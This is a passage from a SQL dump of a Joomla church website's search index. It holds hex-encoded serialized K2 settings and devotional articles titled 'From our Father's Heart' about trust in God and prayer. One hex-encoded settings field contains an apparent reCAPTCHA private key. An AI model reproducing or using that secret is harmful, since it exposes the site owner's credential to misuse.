33a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223230223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33373a2234383a66726f6d2d6f75722d6661746865722d732d68656172742d32312d30352d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35353a22636f6d706f6e656e742f6b322f6974656d2f34382d66726f6d2d6f75722d6661746865722d732d68656172742d32312d30352d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3438223b733a353a22726f757465223b733a37343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d34383a66726f6d2d6f75722d6661746865722d732d68656172742d32312d30352d32303137223b733a353a227469746c65223b733a33363a2246726f6d206f7572204661746865722773204865617274202832312f30352f3230313729223b733a31313a226465736372697074696f6e223b733a3434383a2220446561726c792042656c6f766564206f6620476f642c20426520436f6e666964656e7420696e20476f6427732050726f6d6973652120446f6e2774206c657420796f757220747275737420696e20746865204c6f726420646965206e6f206d617474657220776861742068617070656e732e204576656e20696e207468652066616365206f66206e6567617469766520736974756174696f6e7320616e642063697263756d7374616e636573207768696368207365656d20756e6661766f757261626c652c206e65766572206c657420796f757220636f6e666964656e636520696e20476f64277320776f726420616e64206162696c697479206469652e20476f6420697320616c7761797320657665722061626c6520746f20646f2077686174204865207361696420486520776f756c6420646f2e204576656e207768656e20796f75206172652068617264207072657373656420616e642061726520676f696e67207468726f75676820746f7567682074696d65732c206c657420796f7572206865617274207374617920696e20476f6420616e64206c657420796f757220636f6e666964656e636520696e2048696d206e6576657220776176652e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30352d32312031383a34393a3532223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30352d32312031383a34393a3532223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(267, 'index.php?option=com_k2&view=item&id=43', 'index.php?option=com_k2&view=item&id=43:from-our-father-s-heart-16-04-2017', 'From our Father\'s Heart (16/04/2017)', ' Dearly Beloved Let God lighten your candle. Never joke with your intimacy with God. No matter how busy you get, don\'t lose your time with Jesus. Intimacy with the Lord is so vital to your walking and living in the experiences of the believer in life. Intimacy is personal. Though available, intimacy is self-generated; no one can do it for you, you must do it yourself. It is self-cultivated and deliberate. ', '2017-06-25 14:19:40', 'd449d3068e648f162e5f1d70751d4d53', 1, 1, 1, '*', '2017-04-16 18:21:51', '0000-00-00 00:00:00', '2017-04-16 18:21:51', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223433223b733a353a22616c696173223b733a33343a2266726f6d2d6f75722d6661746865722d732d68656172742d31362d30342d32303137223b733a373a2273756d6d617279223b733a3432343a223c703e446561726c792042656c6f7665643c2f703e0d0a3c703e4c657420476f64206c69676874656e20796f75722063616e646c652e204e65766572206a6f6b65207769746820796f757220696e74696d616379207769746820476f642e204e6f206d617474657220686f77206275737920796f75206765742c20646f6e2774206c6f736520796f75722074696d652077697468204a657375732e20496e74696d616379207769746820746865204c6f726420697320736f20766974616c20746f20796f75722077616c6b696e6720616e64206c6976696e6720696e2074686520657870657269656e636573206f66207468652062656c696576657220696e206c6966652e20496e74696d61637920697320706572736f6e616c2e2054686f75676820617661696c61626c652c20696e74696d6163792069732073656c662d67656e6572617465643b206e6f206f6e652063616e20646f20697420666f7220796f752c20796f75206d75737420646f20697420796f757273656c662e2049742069732073656c662d63756c7469766174656420616e642064656c696265726174652e3c2f703e0d0a223b733a343a22626f6479223b733a323137323a220d0a3c703e42652064656c696265726174652061626f757420706572736f6e616c20776f72736869702e204b65657020696e74696d61637920616e6420666c656520616e797468696e6720746861742063616e206272696e6720636c6f7564696e6573732061726f756e6420796f757220736f756c20737563682074686174206e6f206c6967687420697320636f6d696e672066726f6d20476f642e20496e69717569747920616e6420726562656c6c696f6e206272696e677320636c6f7564696e6573732061726f756e642061206d616ee280997320736f756c2e205969656c6420746f20636f7272656374696f6e20616e64206469736369706c696e652e205969656c6420746f2074686520486f6c792053706972697420617320486520636f72726563747320796f752e2054686520486f6c792053706972697420636f6d657320666972737420746f20636f727265637420796f75722077726f6e6720616e64207468656e206272696e6773206c6967687420746f20796f757220736f756c2c2073706972697475616c20636f6d6d756e69636174696f6e73206f7220646976696e6520696e737472756374696f6e7320646f6e277420636f6d6520746f206120646566696c6564206f7220726562656c6c696f7573207370697269742e204b65657020796f75722074696d6520616e6420696e74696d616379207769746820476f642c2074686174e280997320776861742067756172616e7465657320796f752061206261707469736d206f66206469736365726e696e6720616e642061206d617374657279206f662074686520737069726974207265616c6d2e3c2f703e0d0a3c703e446f20616e6420776f726b2074686f73652061637469766974696573207468617420636f6e6e65637420796f7520746f2074686520737069726974207265616c6d2e3c2f703e0d0a3c703e2831295072617920726567756c61726c7920696e20746865205370697269742e20446f6e2774206c657420796f7572206d6f75746820626520636f6c642c207072617920696e2074686520486f6c792047686f737421c2a03c2f703e0d0a3c703e2832294c65742074686520576f7264206f6620476f642066696c6c20796f7572207370697269742e20526567756c61722072656164696e67206f66207468652053637269707475726573206c6f61647320757020796f757220737069726974206d616b696e6720796f7520726561647920616e64207374726f6e6720666f7220626174746c652e3c2f703e0d0a3c703e5468652070726573656e6365206f6620746865204c6f7264206973206f757220646976696e6520616476616e746167653c2f703e0d0a3c703e4163747320373a393c2f703e0d0a3c703e392022416e642074686520706174726961726368732c206265636f6d696e6720656e76696f75732c20736f6c64204a6f7365706820696e746f2045677970742e2042757420476f642077617320776974682068696d3c2f703e0d0a3c703e5468652070726573656e6365206f6620476f64207769746820796f75206973207374726f6e676572207468616e20616e7920686174726564206f66206d616e206f7220616e797468696e67206d616e20646f657320616761696e737420796f752e20596f752063616e206d616b6520697420696e206c69666520616e642064657374696e79207769746820476f64e28099732068656c70206f6e6c792c206576656e206966207468657265206973206e6f2068756d616e2068656c702e20596f752063616ee2809974206c6173742077697468206d6572652068756d616e2068656c702e20496e20666163742c20476f6420686173207075742061206375727365206f6e2061206d616e2074686174206d616b6573206d616e206869732068656c7020284973612e2033303a31e2809332292e205468652061726d206f6620666c657368207368616c6c206661696c21204576656e20696e2072656c6174696f6e73686970732c20646f6ee2809974206c6f6f6b20617420776861742070656f706c6520686176652062757420636f6e73696465722077686f2069732077697468207468656d2e205768656e20796f752067657420746f2061206368757263682c20646f6ee280997420636f6e7369646572207468652066616e7461737469632063617468656472616c206275742061736b2c20e2809c497320476f642077697468207468656d3fe2809d3c2f703e0d0a3c703e50726f76657262732031303a32323c2f703e0d0a3c703e32322054686520626c657373696e67206f6620746865204c6f7264206d616b6573206f6e6520726963682c20416e642048652061646473206e6f20736f72726f7720776974682069742e3c2f703e0d0a3c703e546865204c6f7264207761732077697468204a6f7365706820696e204567797074207768656e206e6f206f6e652077617320776974682068696d2e20496e20666163742c20616c6c207765726520616761696e73742068696d2c20627574206f6e65207769746820476f6420697320746865206d616a6f7269747921204c657420476f64206265207769746820796f7520746f6f2e2043756c74697661746520696e74696d61637920776974682048696d207468726f7567682070726179657220616e642048697320776f72642077697468207468652073757072656d652068656c70206f662074686520486f6c79205370697269742e20c2a04974206973206e6f74206279206861726420776f726b20616c6f6e652074686174206d616e206d616b6573206974213c2f703e0d0a3c703e417320796f7520646f20746865736520616e642064726177206e65617220746f20476f642c20796f752077696c6c20657870657269656e63652048696d206472617720636c6f73657220746f20796f7520746f6f2e2054696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375732e3c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30352d31342031353a33383a3233223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e43